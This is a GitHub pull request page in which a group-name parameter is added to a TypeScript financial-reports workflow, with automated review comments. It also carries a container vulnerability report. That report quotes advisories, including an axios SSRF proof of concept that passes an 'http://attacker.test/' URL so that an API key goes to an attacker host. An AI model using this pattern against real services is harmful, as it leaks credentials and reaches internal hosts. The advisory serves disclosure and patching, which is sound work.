Skip to content

Conversation

@anatolyshipitz
Copy link
Collaborator

  • Updated the getTargetUnits function to accept a groupName parameter, enhancing its flexibility and allowing for targeted data retrieval.
  • Modified the TargetUnitRepository and its interface to reflect the new parameter requirement.
  • Adjusted related tests to ensure proper functionality with the new parameter, including validation for group names.
  • Enhanced SQL query to utilize the group name for fetching relevant target units.

These changes improve the overall functionality and maintainability of the weekly financial reports workflow.

- Introduced `GroupNameEnum` in `weeklyFinancialReport.ts` to define group names for financial reports.
- Updated `types.ts` to import `GroupNameEnum` and added a new type `GroupName` based on the enum.

These changes enhance type safety and improve the organization of group name constants within the application.
- Updated `weeklyFinancialReportsWorkflow` to accept a `groupName` parameter, ensuring it is validated against the `GroupNameEnum`.
- Added error handling to throw an `AppError` for invalid group names, improving robustness and clarity in error reporting.
- Modified the corresponding test to reflect the new parameter usage.

These changes enhance the workflow's functionality and ensure that only valid group names are processed.
- Updated the `getTargetUnits` function to accept a `groupName` parameter, enhancing its flexibility and allowing for targeted data retrieval.
- Modified the `TargetUnitRepository` and its interface to reflect the new parameter requirement.
- Adjusted related tests to ensure proper functionality with the new parameter, including validation for group names.
- Enhanced SQL query to utilize the group name for fetching relevant target units.

These changes improve the overall functionality and maintainability of the weekly financial reports workflow.
@anatolyshipitz anatolyshipitz requested a review from killev as a code owner June 10, 2025 15:40
@coderabbitai
Copy link

coderabbitai bot commented Jun 10, 2025

📝 Walkthrough

Walkthrough

The changes update the getTargetUnits function and all related code to require a groupName parameter, passing it through repository interfaces, implementations, and workflow logic. The SQL query is updated to filter by this group name. Corresponding unit and workflow tests are revised to use and validate the new parameter and its error handling.

Changes

File(s) Change Summary
.../getTargetUnits.ts, .../ITargetUnitRepository.ts, .../TargetUnitRepository.ts getTargetUnits and repository interfaces updated to require groupName parameter; implementation and calls revised.
.../queries.ts SQL query modified to join custom_values and filter by groupName parameter.
.../getTargetUnits.test.ts, .../TargetUnitRepository.test.ts Tests updated to pass GroupNameEnum to getTargetUnits; imports and descriptions adjusted.
.../weeklyFinancialReports.workflow.ts, .../weeklyFinancialReports.workflow.test.ts Workflow updated to pass groupName to activity; tests enhanced for parameter validation and error propagation.

Sequence Diagram(s)

sequenceDiagram
    participant Workflow
    participant getTargetUnits Activity
    participant TargetUnitRepository
    participant Database

    Workflow->>getTargetUnits Activity: getTargetUnits(groupName)
    getTargetUnits Activity->>TargetUnitRepository: getTargetUnits(groupName)
    TargetUnitRepository->>Database: Execute SQL with groupName
    Database-->>TargetUnitRepository: Target units data
    TargetUnitRepository-->>getTargetUnits Activity: Target units
    getTargetUnits Activity-->>Workflow: File link
    Workflow->>fetchFinancialAppData Activity: fetchFinancialAppData(file link)
    fetchFinancialAppData Activity-->>Workflow: Final file link
Loading

Possibly related PRs

  • #42: Introduces the initial TargetUnitRepository and related types; this PR builds directly upon that implementation.
  • #60: Modifies weeklyFinancialReportsWorkflow to accept and validate groupName, closely related to this PR's parameter passing and usage.
  • #59: Introduces the GroupName type and GroupNameEnum, which are required for the changes in this PR.

Suggested reviewers

  • killev
✨ Finishing Touches
  • 📝 Generate Docstrings

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share
🪧 Tips

Chat

There are 3 ways to chat with CodeRabbit:

  • Review comments: Directly reply to a review comment made by CodeRabbit. Example:
    • I pushed a fix in commit <commit_id>, please review it.
    • Explain this complex logic.
    • Open a follow-up GitHub issue for this discussion.
  • Files and specific lines of code (under the "Files changed" tab): Tag @coderabbitai in a new review comment at the desired location with your query. Examples:
    • @coderabbitai explain this code block.
    • @coderabbitai modularize this function.
  • PR comments: Tag @coderabbitai in a new PR comment to ask questions about the PR branch. For the best results, please provide a very specific query, as very limited context is provided in this mode. Examples:
    • @coderabbitai gather interesting stats about this repository and render them as a table. Additionally, render a pie chart showing the language distribution in the codebase.
    • @coderabbitai read src/utils.ts and explain its main purpose.
    • @coderabbitai read the files in the src/scheduler package and generate a class diagram using mermaid and a README in the markdown format.
    • @coderabbitai help me debug CodeRabbit configuration file.

Support

Need help? Create a ticket on our support page for assistance with any issues or questions.

Note: Be mindful of the bot's finite context window. It's strongly recommended to break down tasks such as reading entire modules into smaller chunks. For a focused discussion, use review comments to chat about specific files and their changes, instead of using the PR comments.

CodeRabbit Commands (Invoked using PR comments)

  • @coderabbitai pause to pause the reviews on a PR.
  • @coderabbitai resume to resume the paused reviews.
  • @coderabbitai review to trigger an incremental review. This is useful when automatic reviews are disabled for the repository.
  • @coderabbitai full review to do a full review from scratch and review all the files again.
  • @coderabbitai summary to regenerate the summary of the PR.
  • @coderabbitai generate docstrings to generate docstrings for this PR.
  • @coderabbitai generate sequence diagram to generate a sequence diagram of the changes in this PR.
  • @coderabbitai resolve resolve all the CodeRabbit review comments.
  • @coderabbitai configuration to show the current CodeRabbit configuration for the repository.
  • @coderabbitai help to get help.

Other keywords and placeholders

  • Add @coderabbitai ignore anywhere in the PR description to prevent this PR from being reviewed.
  • Add @coderabbitai summary to generate the high-level summary at a specific location in the PR description.
  • Add @coderabbitai anywhere in the PR title to generate the title automatically.

CodeRabbit Configuration File (.coderabbit.yaml)

  • You can programmatically configure CodeRabbit by adding a .coderabbit.yaml file to the root of your repository.
  • Please see the configuration documentation for more information.
  • If your editor has YAML language server enabled, you can add the path at the top of this file to enable auto-completion and validation: # yaml-language-server: $schema=https://coderabbit.ai/integrations/schema.v2.json

Documentation and Community

  • Visit our Documentation for detailed information on how to use CodeRabbit.
  • Join our Discord Community to get help, request features, and share feedback.
  • Follow us on X/Twitter for updates and announcements.

@github-actions
Copy link

github-actions bot commented Jun 10, 2025

🔍 Vulnerabilities of n8n-test:latest

📦 Image Reference n8n-test:latest
digestsha256:e82621bc8773e2e03695355ef539d9f221f9368903c63d44ea51284569994550
vulnerabilitiescritical: 2 high: 6 medium: 0 low: 0
platformlinux/amd64
size243 MB
packages1628
📦 Base Image node:20-alpine
also known as
  • 20-alpine3.21
  • 20.19-alpine
  • 20.19-alpine3.21
  • 20.19.0-alpine
  • 20.19.0-alpine3.21
  • iron-alpine
  • iron-alpine3.21
digestsha256:37a5a350292926f98d48de9af160b0a3f7fcb141566117ee452742739500a5bd
vulnerabilitiescritical: 0 high: 1 medium: 0 low: 1
critical: 1 high: 0 medium: 0 low: 0 stdlib 1.24.0 (golang)

pkg:golang/[email protected]

critical : CVE--2025--22871

Affected range>=1.24.0-0
<1.24.2
Fixed version1.24.2
EPSS Score0.018%
EPSS Percentile3rd percentile
Description

The net/http package improperly accepts a bare LF as a line terminator in chunked data chunk-size lines. This can permit request smuggling if a net/http server is used in conjunction with a server that incorrectly accepts a bare LF as part of a chunk-ext.

critical: 1 high: 0 medium: 0 low: 0 samlify 2.9.0 (npm)

pkg:npm/[email protected]

critical 9.9: CVE--2025--47949 Improper Verification of Cryptographic Signature

Affected range<2.10.0
Fixed version2.10.0
CVSS Score9.9
CVSS VectorCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
EPSS Score0.023%
EPSS Percentile5th percentile
Description

A Signature Wrapping attack has been found in samlify <v2.10.0, allowing an attacker to forge a SAML Response to authenticate as any user.
An attacker would need a signed XML document by the identity provider.

critical: 0 high: 1 medium: 0 low: 0 cross-spawn 7.0.3 (npm)

pkg:npm/[email protected]

high 7.7: CVE--2024--21538 Inefficient Regular Expression Complexity

Affected range>=7.0.0
<7.0.5
Fixed version7.0.5
CVSS Score7.7
CVSS VectorCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P
EPSS Score0.151%
EPSS Percentile37th percentile
Description

Versions of the package cross-spawn before 7.0.5 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string.

critical: 0 high: 1 medium: 0 low: 0 tar-fs 2.1.2 (npm)

pkg:npm/[email protected]

high 8.7: CVE--2025--48387 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected range>=2.0.0
<2.1.3
Fixed version2.1.3
CVSS Score8.7
CVSS VectorCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
EPSS Score0.082%
EPSS Percentile25th percentile
Description

Impact

v3.0.8, v2.1.2, v1.16.4 and below

Patches

Has been patched in 3.0.9, 2.1.3, and 1.16.5

Workarounds

You can use the ignore option to ignore non files/directories.

  ignore (_, header) {
    // pass files & directories, ignore e.g. symlinks
    return header.type !== 'file' && header.type !== 'directory'
  }

Credit

Thank you Caleb Brown from Google Open Source Security Team for reporting this in detail.

critical: 0 high: 1 medium: 0 low: 0 pdfjs-dist 2.16.105 (npm)

pkg:npm/[email protected]

high 8.8: CVE--2024--4367 Improper Check for Unusual or Exceptional Conditions

Affected range<=4.1.392
Fixed version4.2.67
CVSS Score8.8
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS Score15.980%
EPSS Percentile94th percentile
Description

Impact

If pdf.js is used to load a malicious PDF, and PDF.js is configured with isEvalSupported set to true (which is the default value), unrestricted attacker-controlled JavaScript will be executed in the context of the hosting domain.

Patches

The patch removes the use of eval:
mozilla/pdf.js#18015

Workarounds

Set the option isEvalSupported to false.

References

https://bugzilla.mozilla.org/show_bug.cgi?id=1893645

critical: 0 high: 1 medium: 0 low: 0 multer 1.4.5-lts.2 (npm)

pkg:npm/[email protected]

high 7.5: CVE--2025--47935 Missing Release of Memory after Effective Lifetime

Affected range<2.0.0
Fixed version2.0.0
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.049%
EPSS Percentile15th percentile
Description

Impact

Multer <2.0.0 is vulnerable to a resource exhaustion and memory leak issue due to improper stream handling. When the HTTP request stream emits an error, the internal busboy stream is not closed, violating Node.js stream safety guidance.

This leads to unclosed streams accumulating over time, consuming memory and file descriptors. Under sustained or repeated failure conditions, this can result in denial of service, requiring manual server restarts to recover. All users of Multer handling file uploads are potentially impacted.

Patches

Users should upgrade to 2.0.0

Workarounds

None

References

critical: 0 high: 1 medium: 0 low: 0 axios 1.7.4 (npm)

pkg:npm/[email protected]

high 7.7: CVE--2025--27152 Server-Side Request Forgery (SSRF)

Affected range>=1.0.0
<1.8.2
Fixed version1.8.2
CVSS Score7.7
CVSS VectorCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
EPSS Score0.021%
EPSS Percentile4th percentile
Description

Summary

A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery).
Reference: axios/axios#6463

A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.

Details

Consider the following code snippet:

import axios from "axios";

const internalAPIClient = axios.create({
  baseURL: "http://example.test/api/v1/users/",
  headers: {
    "X-API-KEY": "1234567890",
  },
});

// const userId = "123";
const userId = "http://attacker.test/";

await internalAPIClient.get(userId); // SSRF

In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.

It is recommended that:

  • When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL.
  • Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL.

PoC

Follow the steps below to reproduce the issue:

  1. Set up two simple HTTP servers:
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html 
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
  1. Create a script (e.g., main.js):
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
  1. Run the script:
$ node main.js
this is server2

Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/.

Impact

  • Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
  • SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
  • Affected Users: Software that uses baseURL and does not validate path parameters is affected by this issue.
critical: 0 high: 1 medium: 0 low: 0 semver 5.3.0 (npm)

pkg:npm/[email protected]

high 7.5: CVE--2022--25883 Inefficient Regular Expression Complexity

Affected range<5.7.2
Fixed version5.7.2
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.308%
EPSS Percentile53rd percentile
Description

Versions of the package semver before 7.5.2 on the 7.x branch, before 6.3.1 on the 6.x branch, and all other versions before 5.7.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.

- Renamed `getTargetUnitsQuery` to `TARGET_UNITS_QUERY` for improved clarity and consistency in naming conventions.
- Updated the import statement in `TargetUnitRepository` to reflect the new query name.

These changes enhance code readability and maintainability within the TargetUnit service.
killev
killev previously approved these changes Jun 11, 2025
Copy link
Contributor

@killev killev left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

looks good

Base automatically changed from feature/groupName-validation to main June 11, 2025 10:13
@anatolyshipitz anatolyshipitz dismissed killev’s stale review June 11, 2025 10:13

The base branch was changed.

anatolyshipitz added a commit that referenced this pull request Jun 11, 2025
- Introduced `SlackService` class to facilitate posting messages to a specified Slack channel.
- Implemented error handling to throw an `AppError` if the Slack channel ID is not set, ensuring robust error reporting.
- The service utilizes the Slack Web API for message posting, enhancing integration capabilities with Slack.

These changes improve the application's ability to communicate via Slack and provide a structured approach to message handling.
anatolyshipitz added a commit that referenced this pull request Jun 11, 2025
- Introduced `SlackService` class to facilitate posting messages to a
specified Slack channel.
- Implemented error handling to throw an `AppError` if the Slack channel
ID is not set, ensuring robust error reporting.
- The service utilizes the Slack Web API for message posting, enhancing
integration capabilities with Slack.

These changes improve the application's ability to communicate via Slack
and provide a structured approach to message handling.
anatolyshipitz and others added 2 commits June 11, 2025 14:26
- Added a mock for `fetchFinancialAppData` in the test suite to validate its integration with the `weeklyFinancialReportsWorkflow`.
- Implemented a new test case to ensure that errors from `fetchFinancialAppData` are properly propagated.
- Updated the error message for invalid group names to correct a typo in the parameter name.

These changes improve the robustness of the workflow tests and ensure accurate error reporting.
@anatolyshipitz anatolyshipitz enabled auto-merge (squash) June 11, 2025 12:28
Copy link

@coderabbitai coderabbitai bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 0

🧹 Nitpick comments (8)
workers/main/src/activities/weeklyFinancialReports/getTargetUnits.ts (1)

21-24: Embed groupName into the generated file name for easier traceability

When multiple groups are processed in quick succession, the current naming scheme (target-units-<timestamp>.json) makes it difficult to see which JSON belongs to which group. Appending the groupName keeps artifacts self-describing with zero cost.

-    const filename = `data/weeklyFinancialReportsWorkflow/getTargetUnits/target-units-${Date.now()}.json`;
+    const filename = `data/weeklyFinancialReportsWorkflow/getTargetUnits/${groupName}-target-units-${Date.now()}.json`;
workers/main/src/workflows/weeklyFinancialReports/weeklyFinancialReports.workflow.ts (1)

17-20: Avoid recomputing Object.values(GroupNameEnum) on every invocation

Object.values allocates a new array each call. For a hot workflow this is negligible but still unnecessary. Caching in a const (or using a Set) gives O(1) lookups and cleaner intent.

-  if (!(Object.values(GroupNameEnum) as GroupName[]).includes(groupName)) {
+  const allowedGroups: ReadonlySet<GroupName> = new Set(Object.values(GroupNameEnum));
+  if (!allowedGroups.has(groupName)) {
workers/main/src/services/TargetUnit/TargetUnitRepository.ts (1)

48-52: Preserve the original stack by using the cause option

Wrapping the error is great, but the original stack trace is lost, making debugging harder.
Node ≥16 supports the cause property.

-      throw new TargetUnitRepositoryError(
-        `TargetUnitRepository.getTargetUnits failed: ${(error as Error).message}`,
-      );
+      throw new TargetUnitRepositoryError(
+        `TargetUnitRepository.getTargetUnits failed: ${(error as Error).message}`,
+        { cause: error as Error },
+      );
workers/main/src/activities/weeklyFinancialReports/getTargetUnits.test.ts (3)

117-123: Update the test description to match the new enum-based call

The test name still mentions “default group”, but you are explicitly passing GroupNameEnum.SD_REPORT.
Renaming keeps the spec self-documenting and avoids confusion when additional groups are added later.

-it('returns fileLink when successful (default group)', async () => {
+it('returns fileLink when successful (SD_REPORT group)', async () => {

126-135: Avoid executing the same async path twice in the same assertion block

Calling getTargetUnits twice performs redundant I/O and lengthens test time.
Capture the promise once and run multiple matchers against it.

-    await expect(getTargetUnits(GroupNameEnum.SD_REPORT)).rejects.toThrow(
-      AppError,
-    );
-    await expect(getTargetUnits(GroupNameEnum.SD_REPORT)).rejects.toThrow(
-      'Failed to get Target Units',
-    );
+    const action = getTargetUnits(GroupNameEnum.SD_REPORT);
+    await expect(action).rejects.toThrow(AppError);
+    await expect(action).rejects.toThrow('Failed to get Target Units');

Apply the same pattern to the similar block below to keep tests fast and DRY.


138-145: Duplicate execution – same remark as above

The block duplicates the two-call pattern; refactor identically to keep consistency and reduce runtime.

workers/main/src/services/TargetUnit/ITargetUnitRepository.ts (1)

1-5: Minor layering concern: common types depend on a feature enum

GroupName in ../../common/types is derived from GroupNameEnum that lives in the weekly-report config layer.
This creates an upward dependency from “common” to a feature package, which can snowball into circular-import pain later.

Consider either:

  1. Moving GroupNameEnum into common (preferred), or
  2. Defining GroupName locally here and avoiding the enum indirection.

No functional break, just an architectural heads-up.

workers/main/src/workflows/weeklyFinancialReports/weeklyFinancialReports.workflow.test.ts (1)

8-19: Mock ignores proxyActivities arguments & generics

The workflow passes options to proxyActivities<ActivityTypes>(options).
Your mock discards the incoming options parameter and the generic, which is fine for today but can hide future errors (e.g., timeouts/options mismatches).

Minimal improvement:

-proxyActivities: () => ({
+proxyActivities: (_opts?: unknown) => ({

…so unexpected argument shapes surface in test failures instead of production.

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 52a2dd7 and 72b7021.

📒 Files selected for processing (8)
  • workers/main/src/activities/weeklyFinancialReports/getTargetUnits.test.ts (4 hunks)
  • workers/main/src/activities/weeklyFinancialReports/getTargetUnits.ts (1 hunks)
  • workers/main/src/services/TargetUnit/ITargetUnitRepository.ts (1 hunks)
  • workers/main/src/services/TargetUnit/TargetUnitRepository.test.ts (3 hunks)
  • workers/main/src/services/TargetUnit/TargetUnitRepository.ts (2 hunks)
  • workers/main/src/services/TargetUnit/queries.ts (1 hunks)
  • workers/main/src/workflows/weeklyFinancialReports/weeklyFinancialReports.workflow.test.ts (1 hunks)
  • workers/main/src/workflows/weeklyFinancialReports/weeklyFinancialReports.workflow.ts (1 hunks)
🧰 Additional context used
🧬 Code Graph Analysis (3)
workers/main/src/services/TargetUnit/TargetUnitRepository.ts (3)
workers/main/src/common/types.ts (2)
  • GroupName (16-16)
  • TargetUnit (3-14)
workers/main/src/services/TargetUnit/types.ts (1)
  • TargetUnitRow (3-12)
workers/main/src/services/TargetUnit/queries.ts (1)
  • TARGET_UNITS_QUERY (1-43)
workers/main/src/services/TargetUnit/ITargetUnitRepository.ts (1)
workers/main/src/common/types.ts (2)
  • GroupName (16-16)
  • TargetUnit (3-14)
workers/main/src/workflows/weeklyFinancialReports/weeklyFinancialReports.workflow.test.ts (2)
workers/main/src/workflows/weeklyFinancialReports/weeklyFinancialReports.workflow.ts (1)
  • weeklyFinancialReportsWorkflow (14-27)
workers/main/src/common/errors/AppError.ts (1)
  • AppError (1-9)
⏰ Context from checks skipped due to timeout of 90000ms (5)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
  • GitHub Check: Docker Security Scanning (temporal, Dockerfile.temporal, temporal-test:latest)
  • GitHub Check: Service Availability Check
  • GitHub Check: SonarQube
  • GitHub Check: Analyze (javascript-typescript)
🔇 Additional comments (3)
workers/main/src/services/TargetUnit/queries.ts (1)

21-28: Potential full-table scan on custom_values; consider pinning the custom field id

custom_values can grow quickly.
Filtering only by customized_type = 'Principal' and value = ? may bypass indexes, causing a scan.
If the group name is stored in a dedicated custom field, also constrain by cv.custom_field_id = <id> so the composite (custom_field_id, value) index (common in Redmine) can be used.

Please verify the schema and add the extra predicate if applicable.

workers/main/src/services/TargetUnit/TargetUnitRepository.test.ts (1)

58-60: 👍 Tests correctly exercise the new parameter

The updated assertions keep the focus on repository behaviour while validating the new groupName argument. Looks good.

workers/main/src/workflows/weeklyFinancialReports/weeklyFinancialReports.workflow.test.ts (1)

1-3: Import executed before mock – double-check Vitest hoisting

import * as workflowModule from '@temporalio/workflow'; is declared before the vi.mock() for that module.
Vitest usually hoists vi.mock calls, but the behaviour is opt-in ("hoisted": true transform).
If hoisting is disabled anywhere (e.g., via unhoisted: true), the real module will load, and your stub won’t apply.

Safer ordering:

vi.mock('@temporalio/workflow', /* factory */);
import * as workflowModule from '@temporalio/workflow';

Not a blocker if your project keeps default hoisting, but worth verifying.

@sonarqubecloud
Copy link

@anatolyshipitz anatolyshipitz disabled auto-merge June 11, 2025 12:32
@anatolyshipitz anatolyshipitz enabled auto-merge (squash) June 11, 2025 12:32
@anatolyshipitz anatolyshipitz self-assigned this Jun 11, 2025
@anatolyshipitz anatolyshipitz requested a review from killev June 11, 2025 12:34
@anatolyshipitz anatolyshipitz disabled auto-merge June 11, 2025 15:42
@anatolyshipitz anatolyshipitz merged commit a3040cb into main Jun 11, 2025
12 checks passed
@anatolyshipitz anatolyshipitz deleted the feature/process-group-name-parameter branch June 11, 2025 15:43
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

3 participants